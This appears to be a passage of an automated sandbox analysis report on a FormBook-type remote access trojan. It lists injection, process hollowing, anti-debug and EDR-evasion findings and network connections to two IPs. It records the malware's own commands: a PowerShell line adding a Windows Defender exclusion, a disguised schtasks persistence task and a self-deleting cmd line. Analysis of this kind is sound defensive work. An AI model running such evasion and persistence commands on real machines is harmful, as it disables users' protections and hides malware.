Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01150C44 mov eax, dword ptr fs:[00000030h]	7_2_01150C44
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01150C44 mov eax, dword ptr fs:[00000030h]	7_2_01150C44
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0113CC74 mov eax, dword ptr fs:[00000030h]	7_2_0113CC74
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01128C8D mov eax, dword ptr fs:[00000030h]	7_2_01128C8D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01158CB1 mov eax, dword ptr fs:[00000030h]	7_2_01158CB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01158CB1 mov eax, dword ptr fs:[00000030h]	7_2_01158CB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B4CA8 mov eax, dword ptr fs:[00000030h]	7_2_011B4CA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011ACCA0 mov ecx, dword ptr fs:[00000030h]	7_2_011ACCA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011ACCA0 mov eax, dword ptr fs:[00000030h]	7_2_011ACCA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011ACCA0 mov eax, dword ptr fs:[00000030h]	7_2_011ACCA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011ACCA0 mov eax, dword ptr fs:[00000030h]	7_2_011ACCA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01128CD0 mov eax, dword ptr fs:[00000030h]	7_2_01128CD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01142CDC mov eax, dword ptr fs:[00000030h]	7_2_01142CDC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01142CDC mov eax, dword ptr fs:[00000030h]	7_2_01142CDC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01142CDC mov eax, dword ptr fs:[00000030h]	7_2_01142CDC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0112CCC8 mov eax, dword ptr fs:[00000030h]	7_2_0112CCC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01162CF0 mov eax, dword ptr fs:[00000030h]	7_2_01162CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01162CF0 mov eax, dword ptr fs:[00000030h]	7_2_01162CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01162CF0 mov eax, dword ptr fs:[00000030h]	7_2_01162CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01162CF0 mov eax, dword ptr fs:[00000030h]	7_2_01162CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01132F12 mov eax, dword ptr fs:[00000030h]	7_2_01132F12
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116CF1F mov eax, dword ptr fs:[00000030h]	7_2_0116CF1F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01174F03 mov eax, dword ptr fs:[00000030h]	7_2_01174F03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0115EF28 mov eax, dword ptr fs:[00000030h]	7_2_0115EF28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0112CF50 mov eax, dword ptr fs:[00000030h]	7_2_0112CF50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0112CF50 mov eax, dword ptr fs:[00000030h]	7_2_0112CF50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0112CF50 mov eax, dword ptr fs:[00000030h]	7_2_0112CF50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0112CF50 mov eax, dword ptr fs:[00000030h]	7_2_0112CF50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0112CF50 mov eax, dword ptr fs:[00000030h]	7_2_0112CF50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0112CF50 mov eax, dword ptr fs:[00000030h]	7_2_0112CF50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116CF50 mov eax, dword ptr fs:[00000030h]	7_2_0116CF50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01142F5B mov eax, dword ptr fs:[00000030h]	7_2_01142F5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01142F5B mov eax, dword ptr fs:[00000030h]	7_2_01142F5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01142F5B mov eax, dword ptr fs:[00000030h]	7_2_01142F5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01142F5B mov eax, dword ptr fs:[00000030h]	7_2_01142F5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01142F5B mov eax, dword ptr fs:[00000030h]	7_2_01142F5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01142F5B mov eax, dword ptr fs:[00000030h]	7_2_01142F5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01142F5B mov eax, dword ptr fs:[00000030h]	7_2_01142F5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0113AF42 mov eax, dword ptr fs:[00000030h]	7_2_0113AF42
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0113AF42 mov eax, dword ptr fs:[00000030h]	7_2_0113AF42
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0113AF42 mov eax, dword ptr fs:[00000030h]	7_2_0113AF42
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01142F47 mov eax, dword ptr fs:[00000030h]	7_2_01142F47
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01142F47 mov eax, dword ptr fs:[00000030h]	7_2_01142F47
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01142F47 mov eax, dword ptr fs:[00000030h]	7_2_01142F47
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01142F47 mov eax, dword ptr fs:[00000030h]	7_2_01142F47
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01142F47 mov eax, dword ptr fs:[00000030h]	7_2_01142F47
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01142F47 mov eax, dword ptr fs:[00000030h]	7_2_01142F47
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01142F47 mov eax, dword ptr fs:[00000030h]	7_2_01142F47
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B4F40 mov eax, dword ptr fs:[00000030h]	7_2_011B4F40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B4F40 mov eax, dword ptr fs:[00000030h]	7_2_011B4F40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B4F40 mov eax, dword ptr fs:[00000030h]	7_2_011B4F40

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 15_2_00722E62 GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

15_2_00722E62

Enables debug privileges

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_00726510 SetUnhandledExceptionFilter,		15_2_00726510
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_007261C0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		15_2_007261C0

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 157.53.227.1 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 172.67.134.182 80			Jump to behavior

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\KfYvtUBOq.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\KfYvtUBOq.exe"			Jump to behavior

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write			Jump to behavior

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	NtQueueApcThread: Indirect: 0xFEA4F2	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	NtClose: Indirect: 0x111A56C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	NtQueueApcThread: Indirect: 0x111A4F2	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	NtClose: Indirect: 0xFEA56C

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A			Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Section loaded: NULL target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Section loaded: NULL target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Section loaded: NULL target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Section loaded: NULL target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread register set: target process: 4004	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread register set: target process: 4004	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Thread register set: target process: 4004	Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Sample uses process hollowing technique

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Section unmapped: C:\Windows\SysWOW64\rundll32.exe base address: 720000			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Section unmapped: C:\Windows\SysWOW64\rundll32.exe base address: 720000			Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 997008	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: A08008	Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\KfYvtUBOq.exe"	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\KfYvtUBOq" /XML "C:\Users\user\AppData\Local\Temp\tmp89CA.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\KfYvtUBOq" /XML "C:\Users\user\AppData\Local\Temp\tmp9563.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior

Source: explorer.exe, 00000009.00000002.4571895416.00000000013A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.2140613728.00000000013A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: IProgram Manager
Source: explorer.exe, 00000009.00000002.4571895416.00000000013A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.2140613728.00000000013A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000002.4574433830.00000000048E0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000009.00000002.4571895416.00000000013A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.2140613728.00000000013A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000009.00000002.4570236364.0000000000D60000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2139208430.0000000000D69000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: +Progman
Source: explorer.exe, 00000009.00000002.4571895416.00000000013A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.2140613728.00000000013A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000009.00000000.2154297535.00000000098AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3075211732.00000000098E0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979149239.00000000098AD000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd31A

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Queries volume information: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 15_2_00726735 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

15_2_00726735

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 13.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
